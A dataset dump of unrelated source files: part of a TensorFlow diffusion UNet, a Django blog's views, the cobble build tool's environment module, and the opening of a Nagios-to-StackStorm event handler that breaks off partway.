# assert x.shape == h.shape
return x + h
#%%
class AttentionBlock(layers.Layer):
def __init__(self, in_ch):
super(AttentionBlock, self).__init__()
self.in_ch = in_ch
# self.normalize = tfa.layers.GroupNormalization(1)
self.normalize = layers.LayerNormalization()
self.q_layer = layers.Dense(self.in_ch, name='q')
self.k_layer = layers.Dense(self.in_ch, name='k')
self.v_layer = layers.Dense(self.in_ch, name='v')
self.proj_out = layers.Dense(self.in_ch, name='proj_out')
def call(self, x, **kwargs):
B, H, W, C = x.shape
h = self.normalize(x)
q = self.q_layer(h)
k = self.k_layer(h)
v = self.v_layer(h)
w = tf.einsum('bhwc,bHWc->bhwHW', q, k) * (int(self.in_ch) ** (-0.5))
w = tf.reshape(w, [-1, H, W, H * W])
w = tf.nn.softmax(w, -1)
w = tf.reshape(w, [-1, H, W, H, W])
h = tf.einsum('bhwHW,bHWc->bhwc', w, v)
h = self.proj_out(h)
# assert h.shape == x.shape
return x + h
#%%
def build_unet(PARAMS, embedding_dim, dropout=0., embedding_dim_mult=(1, 2, 4, 8), num_res_blocks=4, attn_resolutions=(16, ), resamp_with_conv=True):
x = layers.Input((PARAMS['data_dim'], PARAMS['data_dim'], PARAMS['channel']))
timesteps = layers.Input(())
num_resolutions = len(embedding_dim_mult)
'''Timestep embedding'''
temb = get_timestep_embedding(timesteps, embedding_dim)
temb = layers.Dense(embedding_dim * 4, name='dense0')(temb)
temb = layers.Dense(embedding_dim * 4, name='dense1')(tf.nn.swish(temb))
# assert temb.shape == [B, self.embedding_dim * 4]
'''Downsampling'''
hs = [layers.Conv2D(filters=embedding_dim, kernel_size=3, strides=1, padding='same', name='conv_in')(x)]
for i_level in range(num_resolutions):
# Residual blocks for this resolution
for i_block in range(num_res_blocks):
h = ResnetBlock(dropout=dropout, in_ch=hs[-1].shape[-1], out_ch=embedding_dim * embedding_dim_mult[i_level])(hs[-1], temb=temb)
if h.shape[1] in attn_resolutions:
h = AttentionBlock(in_ch=h.shape[-1])(h)
hs.append(h)
# Downsample
if i_level != num_resolutions - 1:
hs.append(Downsampling(in_ch=hs[-1].shape[-1], with_conv=resamp_with_conv)(hs[-1]))
'''Middle'''
h = hs[-1]
h = ResnetBlock(dropout=dropout, in_ch=embedding_dim * embedding_dim_mult[-1], out_ch=None)(h, temb=temb)
h = AttentionBlock(in_ch=h.shape[-1])(h)
h = ResnetBlock(dropout=dropout, in_ch=embedding_dim * embedding_dim_mult[-1], out_ch=None)(h, temb=temb)
'''Upsampling'''
for i_level in reversed(range(num_resolutions)):
# Residual blocks for this resolution
for i_block in range(num_res_blocks + 1):
h = tf.concat([h, hs.pop()], axis=-1)
h = ResnetBlock(dropout=dropout, in_ch=h.shape[-1], out_ch=embedding_dim * embedding_dim_mult[i_level])(h, temb=temb)
if h.shape[1] in attn_resolutions:
h = AttentionBlock(in_ch=h.shape[-1])(h)
# Upsample
if i_level != 0:
h = Upsampling(in_ch=h.shape[-1], with_conv=resamp_with_conv)(h)
'''End'''
# h = tf.nn.swish(tfa.layers.GroupNormalization(1)(h))
h = tf.nn.swish(layers.LayerNormalization()(h))
h = layers.Conv2D(filters=PARAMS['channel'], kernel_size=3, strides=1, padding='same', name='conv_out')(h)
# assert h.shape == x.shape[:3] + [self.out_ch]
model = K.models.Model([x, timesteps], h)
model.summary()
return model
#%%
# class Unet(K.models.Model):
# def __init__(self, params, embedding_dim, out_ch, dropout=0., embedding_dim_mult=(1, 2, 4, 8), num_res_blocks=2, attn_resolutions=(16, ), resamp_with_conv=True):
# super(Unet, self).__init__()
# self.params = params
# self.embedding_dim = embedding_dim
# self.out_ch = out_ch
# self.dropout = dropout
# self.embedding_dim_mult = embedding_dim_mult
# self.num_res_blocks = num_res_blocks
# self.attn_resolutions = attn_resolutions
# self.resamp_with_conv = resamp_with_conv
# self.num_resolutions = len(self.embedding_dim_mult)
# self.nonlinearity = nonlinearity
# self.normalize = normalize
# self.get_timestep_embedding = get_timestep_embedding
# self.channel_mult = [embedding_dim * m for m in self.embedding_dim_mult]
# '''Downsampling'''
# self.resblocks_down = [ResnetBlock(dropout=self.dropout, C=self.channel_mult[i], out_ch=self.embedding_dim * self.embedding_dim_mult[i])
# for i in range(self.num_resolutions)]
# self.attnblocks_down = AttentionBlock(C=self.attn_resolutions[0])
# self.downsamples_down = [Downsampling(C=self.channel_mult[i], with_conv=self.resamp_with_conv)
# for i in range(self.num_resolutions-1)]
# '''Middle'''
# self.resnet_middle1 = ResnetBlock(dropout=self.dropout, C=self.channel_mult[-1], out_ch=None)
# self.attnblock_middle = AttentionBlock(C=int(self.params['data_dim'] / (2 ** (self.num_resolutions - 1))))
# self.resnet_middle2 = ResnetBlock(dropout=self.dropout, C=self.channel_mult[-1], out_ch=None)
# '''Upsampling'''
# self.resblocks_up = [ResnetBlock(dropout=self.dropout, C=self.channel_mult[::-1][i], out_ch=self.embedding_dim * self.embedding_dim_mult[i])
# for i in range(self.num_resolutions)]
# self.attnblocks_up = AttentionBlock(C=self.attn_resolutions[0])
# self.Upsamples_up = [Upsampling(C=self.channel_mult[::-1][i], with_conv=self.resamp_with_conv)
# for i in range(self.num_resolutions-1)]
# self.dense0 = layers.Dense(self.embedding_dim * 4, name='dense0')
# self.dense1 = layers.Dense(self.embedding_dim * 4, name='dense1')
# self.conv_in = layers.Conv2D(filters=self.embedding_dim, kernel_size=3, strides=1, padding='same', name='conv_in')
# self.conv_out = layers.Conv2D(filters=self.out_ch, kernel_size=3, strides=1, padding='same', name='conv_out')
# def call(self, x, timesteps, **kwargs):
# # B, _, _, _ = tf.shape(x)
# B = self.params['batch_size']
# '''Timestep embedding'''
# temb = self.get_timestep_embedding(timesteps, self.embedding_dim)
# temb = self.dense0(temb)
# temb = self.dense1(nonlinearity(temb))
# # assert temb.shape == [B, self.embedding_dim * 4]
# '''Downsampling'''
# hs = [self.conv_in(x)]
# for i_level in range(self.num_resolutions):
# # Residual blocks for this resolution
# for i_block in range(self.num_res_blocks):
# h = self.resblocks_down[i_block](hs[-1], temb=temb)
# if h.shape[1] in self.attn_resolutions:
# h = self.attnblocks_down(h)
# hs.append(h)
# # Downsample
# if i_level != self.num_resolutions - 1:
# hs.append(self.downsamples_down[i_level](hs[-1]))
# '''Middle'''
# h = hs[-1]
# h = self.resnet_middle1(h, temb=temb)
# h = self.attnblock_middle(h)
# h = self.resnet_middle2(h, temb=temb)
# '''Upsampling'''
# for i_level in reversed(range(self.num_resolutions)):
# # Residual blocks for this resolution
# for i_block in range(self.num_res_blocks + 1):
# h = self.resblocks_up[i_block](tf.concat([h, hs.pop()], axis=-1), temb=temb)
# if h.shape[1] in self.attn_resolutions:
# h = self.attnblocks_up(h)
# # Upsample
# if i_level != 0:
# h = self.Upsamples_up[i_block](h)
# '''End'''
# h = self.nonlinearity(self.normalize(h))
# h = self.conv_out(h)
# # h = nn.conv2d(h, name='conv_out', num_units=out_ch, init_scale=0.)
# # assert h.shape == x.shape[:3] + [self.out_ch]
# return h
#%%
# def model(x, timesteps, embedding_dim, out_ch,
# dropout=0., embedding_dim_mult=(1, 2, 4, 8), num_res_blocks=3, attn_resolutions=(16, ), resamp_with_conv=True):
# # x = layers.Input((32, 32, 3))
# # timesteps = layers.Input(())
# B, _, _, _ = tf.shape(x)
# num_resolutions = len(embedding_dim_mult)
# '''Timestep embedding'''
# temb = get_timestep_embedding(timesteps, embedding_dim)
# temb = layers.Dense(embedding_dim * 4, name='dense0')(temb)
# # temb = nn.dense(temb, name='dense0', num_units=ch * 4)
# temb = layers.Dense(embedding_dim * 4, name='dense1')(nonlinearity(temb))
# # temb = nn.dense(nonlinearity(temb), name='dense1', num_units=ch * 4)
# assert temb.shape == [B, embedding_dim * 4]
# '''Downsampling'''
# hs = [layers.Conv2D(filters=embedding_dim, kernel_size=3, strides=1, padding='same', name='conv_in')(x)]
# # hs = [nn.conv2d(x, name='conv_in', num_units=ch)]
# for i_level in range(num_resolutions):
# # Residual blocks for this resolution
# for i_block in range(num_res_blocks):
# h = resnet_block(hs[-1], temb=temb, out_ch=embedding_dim * embedding_dim_mult[i_level], dropout=dropout)
# # h = resnet_block(hs[-1], name='block_{}'.format(i_block), temb=temb, out_ch=ch * ch_mult[i_level], dropout=dropout)
# if tf.shape(h)[1] in attn_resolutions:
# h = attn_block(h)
# hs.append(h)
# # Downsample
# if i_level != num_resolutions - 1:
# hs.append(downsample(hs[-1], with_conv=resamp_with_conv))
# '''Middle'''
# h = hs[-1]
# h = resnet_block(h, temb=temb, dropout=dropout)
# # h = resnet_block(h, temb=temb, name='block_1', dropout=dropout)
# h = attn_block(h)
# # h = attn_block(h, name='attn_1'.format(i_block), temb=temb)
# h = resnet_block(h, temb=temb, dropout=dropout)
# # h = resnet_block(h, temb=temb, name='block_2', dropout=dropout)
# '''Upsampling'''
# for i_level in reversed(range(num_resolutions)):
# # Residual blocks for this resolution
# for i_block in range(num_res_blocks + 1):
# h = resnet_block(tf.concat([h, hs.pop()], axis=-1), temb=temb, out_ch=embedding_dim * embedding_dim_mult[i_level], dropout=dropout)
# if tf.shape(h)[1] in attn_resolutions:
# h = attn_block(h)
# # Upsample
# if i_level != 0:
# h = upsample(h, with_conv=resamp_with_conv)
# '''End'''
# h = nonlinearity(normalize(h))
# h = layers.Conv2D(filters=out_ch, kernel_size=3, strides=1, padding='same', name='conv_out')(h)
# # h = nn.conv2d(h, name='conv_out', num_units=out_ch, init_scale=0.)
# assert h.shape == x.shape[:3] + [out_ch]
# return h
# # return K.models.Model([x, timesteps], h)
#%%
| 42.643258
| 167
| 0.600883
|
a556b4fcb1cb8fe2debced0b417597ffb87d3059
| 2,882
|
py
|
Python
|
blog/views.py
|
chiraag-kakar/My-Django-Blog
|
af4a56bd678cd0800473be718304c589f1b53904
|
[
"MIT"
] | 5
|
2020-08-28T07:01:32.000Z
|
2020-12-14T00:29:01.000Z
|
blog/views.py
|
Favy-source/My-BlogTask
|
dd6ed005f9a10f2d658a55c597c89cd0a65cbf3c
|
[
"MIT"
] | null | null | null |
blog/views.py
|
Favy-source/My-BlogTask
|
dd6ed005f9a10f2d658a55c597c89cd0a65cbf3c
|
[
"MIT"
] | 4
|
2020-11-10T17:51:19.000Z
|
2021-05-13T13:55:40.000Z
|
from django.shortcuts import render, get_object_or_404
from django.utils import timezone
from .models import Post, Comment
from django.shortcuts import redirect
from django.contrib.auth.decorators import login_required
from .forms import PostForm, CommentForm
def post_detail(request, pk):
post = get_object_or_404(Post, pk=pk)
return render(request, 'blog/post_detail.html', {'post': post})
def post_list(request):
posts = Post.objects.filter(published_date__lte=timezone.now()).order_by('published_date')
return render(request, 'blog/post_list.html', {'posts': posts})
@login_required
def post_new(request):
if request.method == "POST":
form = PostForm(request.POST)
if form.is_valid():
post = form.save(commit=False)
post.author = request.user
# post.published_date = timezone.now()
post.save()
return redirect('post_detail', pk=post.pk)
else:
form = PostForm()
return render(request, 'blog/post_edit.html', {'form': form})
@login_required
def post_edit(request, pk):
post = get_object_or_404(Post, pk=pk)
if request.method == "POST":
form = PostForm(request.POST, instance=post)
if form.is_valid():
post = form.save(commit=False)
post.author = request.user
# post.published_date = timezone.now()
post.save()
return redirect('post_detail', pk=post.pk)
else:
form = PostForm(instance=post)
return render(request, 'blog/post_edit.html', {'form': form})
@login_required
def post_draft_list(request):
posts = Post.objects.filter(published_date__isnull=True).order_by('created_date')
return render(request, 'blog/post_draft_list.html', {'posts': posts})
@login_required
def post_publish(request, pk):
post = get_object_or_404(Post, pk=pk)
post.publish()
return redirect('post_detail', pk=pk)
@login_required
def post_remove(request, pk):
post = get_object_or_404(Post, pk=pk)
post.delete()
return redirect('post_list')
def add_comment_to_post(request, pk):
post = get_object_or_404(Post, pk=pk)
if request.method == "POST":
form = CommentForm(request.POST)
if form.is_valid():
comment = form.save(commit=False)
comment.post = post
comment.save()
return redirect('post_detail', pk=post.pk)
else:
form = CommentForm()
return render(request, 'blog/add_comment_to_post.html', {'form': form})
@login_required
def comment_approve(request, pk):
comment = get_object_or_404(Comment, pk=pk)
comment.approve()
return redirect('post_detail', pk=comment.post.pk)
@login_required
def comment_remove(request, pk):
comment = get_object_or_404(Comment, pk=pk)
comment.delete()
return redirect('post_detail', pk=comment.post.pk)
| 32.75
| 94
| 0.672797
|
4db4af00edf4a7b4a446748ec68b0f4a38ef5e96
| 21,615
|
py
|
Python
|
src/cobble/env.py
|
cbiffle/cobble-build
|
8cd2bc1d03c1d41a2f25ae6b064ab6dafd6016e4
|
[
"BSD-2-Clause"
] | 9
|
2015-09-08T14:35:40.000Z
|
2021-09-27T23:24:19.000Z
|
src/cobble/env.py
|
oxidecomputer/cobble-build
|
e98052fd15d7718950155d595c6d8e07e3f4531e
|
[
"BSD-2-Clause"
] | 1
|
2021-01-07T01:53:22.000Z
|
2021-11-03T13:18:24.000Z
|
src/cobble/env.py
|
cbiffle/cobble-build
|
8cd2bc1d03c1d41a2f25ae6b064ab6dafd6016e4
|
[
"BSD-2-Clause"
] | 2
|
2020-03-12T22:04:12.000Z
|
2020-12-21T20:15:25.000Z
|
"""Environments and supporting types.
An *environment* in Cobble is an immutable key-value mapping, similar to a
Python dict. The contents of environments are restricted, however, in two ways:
1. Each environment is associated with a `KeyRegistry`, and any key used in the
environment must be registered before use.
2. The values that can be stored in the environment are different for each key,
but are generally limited to simple Python data: lists, tuples, sets,
strings, and booleans.
Cobble targets may produce different build steps in different environments --
for example, a C binary can be built in several different environments, each of
which gives a slightly different value for the `c_flags` key.
"""
import hashlib
import pickle
import string
import types
from inspect import signature
from functools import reduce
class EnvKey:
"""Represents a key that can be used in environments.
This is the definition of a key that gets stored with the `KeyRegistry`.
"""
def __init__(self, name, *,
from_literal = None,
combine = None,
default = None,
readout = None,
help = None):
"""Creates a key with a name and strategy functions.
The strategy functions are:
- from_literal: used to translate a literal written in a BUILD file to
the appropriate internal value type. If `None`, any literal is
accepted.
- combine: used to merge different values for the same key. If `None`,
different values are an error condition. If the combine function
returns `None`, the key is deleted.
- default: value to be read when an environment doesn't have a value
for the key.
- readout: used to prepare a value for processing. Can be omitted if no
preparation (beyond from_literal/combine) is needed.
'help' optionally gives a message explaining what the key is for, which
will be printed if it is required but not found.
"""
self.name = name
self._from_literal = from_literal
self._combine = combine
self._default = freeze(default)
self._readout = readout
self.help = help
def from_literal(self, literal):
"""Produces a value legal for this key from `literal`, or throws."""
if self._from_literal is not None:
return self._from_literal(literal)
else:
return literal
def combine(self, lhs, rhs):
"""Combines two values for this key, or throws if they can't be
combined."""
assert self._combine is not None, (
"Environment key %s requires a unique value, got two: %r and %r"
% (self.name, lhs, rhs))
return self._combine(lhs, rhs)
def readout(self, value):
"""Processes `value` for inclusion in a build file. Most keys don't
need custom readout."""
if self._readout is not None:
return self._readout(value)
else:
return value
@property
def default(self):
"""Gets the default value for this key, or `None`."""
return self._default
def overrideable_string_key(name, default = None, readout = None,
help = None):
"""Makes an EnvKey with a given 'name' that will accept a single string and
allow overrides."""
def from_literal(lit):
assert isinstance(lit, str)
return lit
return EnvKey(
name,
from_literal = from_literal,
combine = lambda lhs, rhs: rhs,
default = default,
readout = readout,
help = help,
)
def overrideable_bool_key(name, readout = None, default = None, help = None):
"""Makes an EnvKey with a given 'name' that will accept a single bool and
allow overrides."""
def from_literal(lit):
assert isinstance(lit, bool)
return lit
return EnvKey(
name,
from_literal = from_literal,
combine = lambda lhs, rhs: rhs,
readout = readout,
default = default,
help = help,
)
def appending_string_seq_key(name, readout = None, default = (), help = None):
"""Makes an EnvKey with a given 'name' that will accept sequences of
strings and combine them by appending to yield a tuple."""
def from_literal(lit):
# A string can be iterated as a list of strings. This would produce
# confusing behavior. Avoid this by checking for str first.
assert not isinstance(lit, str) \
and all(isinstance(e, str) for e in lit), \
"Expected list of strings, got: %r" % lit
return tuple(lit)
return EnvKey(
name,
from_literal = from_literal,
combine = lambda lhs, rhs: lhs + rhs,
default = tuple(freeze(e) for e in default), # defensive copy
readout = readout,
help = help,
)
def prepending_string_seq_key(name, default = (), readout = None, help = None):
"""Makes an EnvKey with a given 'name' that will accept sequences of
strings and combine them by prepending. When extended by a delta at several
points in the build graph, this will order items produced by most-derived
targets first. (This is niche, but relevant when linking C programs.)"""
def from_literal(lit):
# A string can be iterated as a list of strings. This would produce
# confusing behavior. Avoid this by checking for str first.
assert not isinstance(lit, str) \
and all(isinstance(e, str) for e in lit), \
"Expected list of strings, got: %r" % lit
return tuple(lit)
return EnvKey(
name,
from_literal = from_literal,
combine = lambda lhs, rhs: rhs + lhs,
default = tuple(freeze(e) for e in default),
readout = readout,
help = help,
)
def frozenset_key(name, readout = None, default = (), help = None):
"""Makes an EnvKey with a given 'name' that will accept iterables of
strings and combine them into a unique frozen set."""
def from_literal(lit):
# A string can be iterated as a list of strings. This would produce
# confusing behavior. Avoid this by checking for str first.
assert not isinstance(lit, str) \
and all(isinstance(e, str) for e in lit), \
"Expected collection of strings for key %s, got: %r" % (name, lit)
return frozenset(lit)
return EnvKey(
name,
from_literal = from_literal,
combine = lambda lhs, rhs: lhs | rhs,
default = frozenset(freeze(e) for e in default),
readout = readout,
help = help,
)
class KeyRegistry(object):
"""Keeps track of environment key definitions."""
def __init__(self):
self._keys = {}
def define(self, key):
"""Defines a new environment key.
key: must be an EnvKey with a name that is unique in this registry.
"""
assert type(key) is EnvKey, \
"Expected EnvKey, got: %r" % key
assert self._keys.get(key.name) is None, \
"Key %s defined twice: first %r, then %r" % (
key.name, self._keys[key.name], key)
self._keys[key.name] = key
# Mapping-like implementation
def __contains__(self, key):
return self._keys.__contains__(key)
def __iter__(self):
return self._keys.__iter__()
def __getitem__(self, name):
return self._keys.__getitem__(name)
def get(self, name):
return self._keys.get(name)
def __len__(self):
return len(self._keys)
class Env(object):
"""An immutable mapping from keys to values, which can be extended in
predictable ways.
Environments can compute a *digest* of their contents, which is a
hexadecimal string. Cobble doesn't promise to derive the digest using any
particular means, and the means may change in later versions.
registry: the key registry for this environment.
prototype_dict: an initial key-value mapping for this environment. Keys and
values must be legal for the registry."""
def __init__(self, registry, prototype_dict = {}, *, _fresh = False):
self._registry = registry
if _fresh:
# Undocumented parameter _fresh is used to indicate that the dict
# does not need to be defensively copied/frozen. This is used
# within Cobble to construct environments with less memory traffic.
self._dict = prototype_dict
else:
# Assume that the dict can contain arbitrary mutable nonsense, and
# that the caller maintained a reference to it.
self._dict = {}
for k, v in prototype_dict.items():
self._dict[k] = freeze(v)
# Digest will be computed on-demand.
self._memoized_digest = None
# Equality / hash
def __eq__(self, other):
# We include the registry to treat environments from different
# registries as disjoint.
# We include the digest as a quick way of establishing inequality. We
# compare the entire dict to avoid the potential for digest collisions,
# which is vanishingly small, and would cause the build system to
# become incorrect, but hey -- let's be obviously correct here.
return self._registry is other._registry \
and self.digest == other.digest \
and self._dict == other._dict
def __hash__(self):
# Fast, constant-time hashing for environments whose digest has already
# been computed. Forces computation of the digest for other
# environments.
return hash(self.digest)
# Iterable/dict interface
def __contains__(self, key):
return self._dict.__contains__(key)
def __iter__(self):
return self._dict.__iter__()
def __getitem__(self, key):
"""The `__getitem__` implementation applies the key's readout function,
which may format or otherwise prepare the result, and falls back to the
key's default if present.
"""
# This implementation has the side effect that, if a key not present in
# the registry somehow makes its way into self._dict, getitem will not
# admit its presence.
key_def = self._registry.get(key)
if key_def is not None:
return key_def.readout(self._dict.get(key, key_def.default))
else:
raise KeyError("Use of undefined environment key %r" % key)
def __len__(self):
return self._dict.__len__()
def subset(self, keys):
"""Creates a new Env by deleting any keys not present in the given
list/set."""
return Env(
self._registry,
dict((k, v) for k, v in self._dict.items() if k in keys),
_fresh = True,
)
def subset_require(self, keys):
"""Returns an environment that contains the same values as 'self' for
the keys named in 'keys', and no others. This operation is used for
combination environment-filtering and error-checking.
If any key in 'keys' is missing in 'self', but the associated key
definition specifies a default value, the default value is copied into
the result.
The keys are interpreted as being required for success: if no default
value is available, it's an error.
"""
e = self.subset(keys)._copy_defaults(keys)
e.require(keys)
return e
def _copy_defaults(self, keys):
"""Produces a new Env containing the contents of this one, plus the
defaults for any missing keys."""
d = dict(self._dict)
for k in keys:
if k not in d:
default = self._registry[k].default
if default is not None:
d[k] = self._registry[k].default
return Env(self._registry, d, _fresh = True)
def without(self, matcher):
"""Returns a new Env that contains the same mappings as this one,
except for keys specified by 'matcher'.
'matcher' can be a predicate function taking one argument (a key name);
if it returns true, the key will be removed from the result.
'matcher' can also be a collection, in which case any key that is 'in
matcher' will be removed from the result.
"""
if isinstance(matcher, types.FunctionType):
d = dict((k, v) for k, v in self._dict.items() if matcher(k))
elif isinstance(matcher, (tuple, list, set, frozenset)):
d = dict((k, v) for k, v in self._dict.items() if k not in matcher)
else:
raise TypeError("Unexpected matcher: %r" % matcher)
return Env(self._registry, d, _fresh = True)
def readout_all(self):
"""Returns a 'dict' representation of this environment containing all
keys with explicit values. The values are passed through the readout
function for each key, equivalent to `self[k]`.
This can be used to prepare a version of this environment for use with
the `ninja_syntax` module, or for easy debug printing, etc.
"""
return dict((k, self[k]) for k in self._dict)
def derive(self, delta):
"""Creates a new Env that is identical to this one except for the
changes made by 'delta'.
Several types of primitives are accepted as deltas:
- Functions/lambdas. Functions are expected to take an environment as
their only argument, and return an environment.
- Dicts. Dict keys are environment key names; dict values are literal
expressions that will be converted to the appropriate type for the
environment key.
"""
if type(delta) is types.FunctionType \
and len(signature(delta).parameters) == 1:
return delta(self)
elif type(delta) is dict:
# Make a shallow copy of our backing dict.
new_dict = dict(self._dict)
# Apply each key in the delta to the copy.
for k, v in delta.items():
key_def = self._registry.get(k)
if key_def is None:
raise Exception("delta contained unknown key %s (=%r)"
% (k, v))
v = self.rewrite(v)
v = key_def.from_literal(v)
if k in self._dict:
new_value = key_def.combine(self._dict[k], v)
if new_value is None:
del new_dict[k]
else:
new_dict[k] = new_value
else:
new_dict[k] = v
# aaaand we're done. Inform the constructor that the dict is fresh
# to avoid an extra copy.
return Env(self._registry, new_dict, _fresh = True)
elif isinstance(delta, (list, tuple)):
return reduce(lambda env, delt: env.derive(delt), delta, self)
elif delta is None:
return self
else:
raise Exception("delta should be func or dict, got: %r" % delta)
@property
def digest(self):
"""Reads out the environment digest for 'self'.
The environment digest is a 'str' containing a hexadecimal number. It
is computed such that two environments with different contents will
have different digests. This means that comparing the digests of two
environments is an inexpensive way of telling if they are identical.
(Ignoring, for the moment, a very small risk of collisions in the
digest function.)
The digest is computed on demand the first time it is requested, and
then stored, so that later requests are cheap. This avoids unnecessary
work for short-lived intermediate environments.
The method for computing the digest is unspecified, i.e. Cobble may
change it in the future and you shouldn't rely on it.
"""
if self._memoized_digest is None:
# To make contents predictable, make a sorted list of key-value
# tuples. Normalize the values while we're here.
contents = sorted((k, _normalize(v)) for k, v in self._dict.items())
# To make contents binary, pickle them. Fix the protocol revision
# so we get more consistent results.
binary = pickle.dumps(contents, protocol = 3)
# To make the length of the contents predictable, hash them.
self._memoized_digest = hashlib.sha1(binary).hexdigest()
return self._memoized_digest
def rewrite(self, literal):
"""Rewrites 'literal' using information from this environment,
returning the rewritten version.
This implements the user-visible templating language available in BUILD
files.
Rewrites proceed as follows:
- For `str`, any environment key named with "$key" or "${key}" is
replaced by the value in this environment, as processed by the key's
readout function. If the key is missing, it's an error.
- For tuples or frozensets, each element is rewritten recursively.
- Booleans and None are returned verbatim.
"""
if isinstance(literal, str):
# The actual processing code, yaaaay
return string.Template(literal).substitute(self)
elif isinstance(literal, tuple):
return tuple(self.rewrite(elt) for elt in literal)
elif isinstance(literal, frozenset):
return frozenset(self.rewrite(elt) for elt in literal)
else:
return literal
def require(self, keys):
"""Asserts that this environment contains values for every key named in
'keys'. Default values count if the key's default value is not None."""
missing = [k for k in keys \
if k not in self._dict and self._registry[k].default is None]
if missing:
msg = "Required keys %r missing from environment" % missing
for m in missing:
h = self._registry[m].help
if h is None:
msg += '\n- \'%s\' has no description' % m
else:
msg += '\n- \'%s\': %s' % (m, h)
raise AssertionError(msg)
def freeze(x):
"""Attempts to make x immutable by converting it into a *frozen datum*.
Input can be str, bool, set, frozenset, list, tuple, None, and any nesting
of those.
Output will consist of str, bool, frozenset, tuple, and None only.
"""
if isinstance(x, str):
# Assume that strings are immutable.
return x
elif isinstance(x, bool):
# Bools too
return x
elif isinstance(x, (set, frozenset)):
return frozenset(freeze(v) for v in x)
elif isinstance(x, (list, tuple)):
return tuple(freeze(v) for v in x)
elif x is None:
return None
else:
raise TypeError("Value cannot be frozen for use in an environment: %r" %
x)
def is_frozen(x):
"""Checks whether 'x' is a frozen datum, something that could result from a
call to 'freeze'."""
return isinstance(x, (str, bool)) \
or x is None \
or (isinstance(x, (frozenset, tuple)) and all(is_frozen(e) for e in
x))
def _normalize(x):
"""Takes a frozen datum and converts sets to sorted tuples, ensuring that
any two data with the same logical contents have the same printed contents.
The result is still a frozen datum, technically, but set semantics are
erased. The result is mostly useful for generating predictable environment
hashes.
It's probably not necessary for this function to be particularly efficient,
because it's contributing to env digests, which are already expensive and
so memoized.
"""
if isinstance(x, (str, bool)) or x is None:
return x
if isinstance(x, frozenset):
return tuple(sorted(_normalize(e) for e in x))
assert isinstance(x, tuple)
return x
def prepare_delta(d):
"""Creates an environment delta from one of a few possible data types.
'd' may be:
- a function that takes an environment as a parameter and returns a new
environment.
- a 'dict', whose keys are environment key names as 'str', and whose values
can be passed to 'freeze'. When applied to an environment, the resulting
delta will pass the dict value and the old value (if any) to each key's
`combine` function.
- 'None', which means no changes.
- A list or tuple, which specifies a sequence of deltas to apply in order;
each element will be passed to 'prepare_delta' recursively.
"""
if isinstance(d, types.FunctionType):
return d
elif isinstance(d, dict):
return dict((k, freeze(v)) for k, v in d.items())
elif d is None:
return None
elif isinstance(d, (list, tuple)):
return tuple(prepare_delta(e) for e in d)
else:
raise TypeError("invalid delta: %r" % d)
def is_delta(d):
"""Checks if 'd' is a plausible environment delta."""
if d is None:
return True
if isinstance(d, types.FunctionType):
return True
if isinstance(d, dict):
return all(isinstance(k, str) and is_frozen(v) for k,v in d.items())
if isinstance(d, (list, tuple)):
return all(is_delta(e) for e in d)
return False
| 38.460854
| 82
| 0.622299
|
b655047b25f1797c56e017420180e441e6b5a021
| 5,614
|
py
|
Python
|
packs/nagios/etc/st2service_handler.py
|
jonico/st2contrib
|
149c9c553f24360d91a14fef7ea6146707de75fd
|
[
"Apache-2.0"
] | 5
|
2016-10-11T11:52:53.000Z
|
2017-06-15T05:21:05.000Z
|
packs/nagios/etc/st2service_handler.py
|
jonico/st2contrib
|
149c9c553f24360d91a14fef7ea6146707de75fd
|
[
"Apache-2.0"
] | 25
|
2016-07-28T17:50:35.000Z
|
2017-09-25T09:26:18.000Z
|
packs/nagios/etc/st2service_handler.py
|
jonico/st2contrib
|
149c9c553f24360d91a14fef7ea6146707de75fd
|
[
"Apache-2.0"
] | 2
|
2015-09-09T11:46:25.000Z
|
2020-11-21T10:10:49.000Z
|
#!/usr/bin/env python
import httplib
try:
import simplejson as json
except ImportError:
import json
import os
import sys
from urlparse import urljoin
try:
import requests
except ImportError:
raise ImportError('Missing dependency requests. Do ``pip install requests``.')
try:
import yaml
except ImportError:
raise ImportError('Missing dependency pyyaml. Do ``pip install pyyaml``.')
# ST2 configuration
ST2_CONFIG_FILE = './config.yaml'
ST2_API_BASE_URL = 'http://localhost:9101/v1'
ST2_AUTH_BASE_URL = 'http://localhost:9100'
ST2_USERNAME = None
ST2_PASSWORD = None
ST2_AUTH_TOKEN = None
ST2_AUTH_PATH = 'tokens'
ST2_WEBHOOKS_PATH = 'webhooks/st2/'
ST2_TRIGGERS_PATH = 'triggertypes/'
ST2_TRIGGERTYPE_PACK = 'nagios'
ST2_TRIGGERTYPE_NAME = 'service-state-change'
ST2_TRIGGERTYPE_REF = '.'.join([ST2_TRIGGERTYPE_PACK, ST2_TRIGGERTYPE_NAME])
STATE_MESSAGE = {
'OK': 'All is well on the Western front.',
'WARNING': 'We gots a warning yo!',
'UNKNOWN': 'It be unknown...',
'CRITICAL': 'Critical!'
}
REGISTERED_WITH_ST2 = False
OK_CODES = [httplib.OK, httplib.CREATED, httplib.ACCEPTED, httplib.CONFLICT]
def _create_trigger_type():
try:
url = _get_st2_triggers_url()
payload = {
'name': ST2_TRIGGERTYPE_NAME,
'pack': ST2_TRIGGERTYPE_PACK,
'description': 'Trigger type for nagios event handler.'
}
# sys.stdout.write('POST: %s: Body: %s\n' % (url, payload))
headers = {}
headers['Content-Type'] = 'application/json; charset=utf-8'
if ST2_AUTH_TOKEN:
headers['X-Auth-Token'] = ST2_AUTH_TOKEN
post_resp = requests.post(url, data=json.dumps(payload), headers=headers)
except:
sys.stderr.write('Unable to register trigger type with st2.')
raise
else:
status = post_resp.status_code
if status not in OK_CODES:
sys.stderr.write('Failed to register trigger type with st2. HTTP_CODE: %d\n' %
status)
raise
else:
sys.stdout.write('Registered trigger type with st2.\n')
def _get_auth_url():
return urljoin(ST2_AUTH_BASE_URL, ST2_AUTH_PATH)
def _get_auth_token():
global ST2_AUTH_TOKEN
auth_url = _get_auth_url()
try:
resp = requests.post(auth_url, json.dumps({'ttl': 5 * 60}),
auth=(ST2_USERNAME, ST2_PASSWORD))
except:
raise Exception('Cannot get auth token from st2. Will try unauthed.')
else:
ST2_AUTH_TOKEN = resp.json()['token']
def _register_with_st2():
global REGISTERED_WITH_ST2
try:
url = urljoin(_get_st2_triggers_url(), ST2_TRIGGERTYPE_REF)
# sys.stdout.write('GET: %s\n' % url)
if not ST2_AUTH_TOKEN:
_get_auth_token()
if ST2_AUTH_TOKEN:
get_resp = requests.get(url, headers={'X-Auth-Token': ST2_AUTH_TOKEN})
else:
get_resp = requests.get(url)
if get_resp.status_code != httplib.OK:
_create_trigger_type()
else:
body = json.loads(get_resp.text)
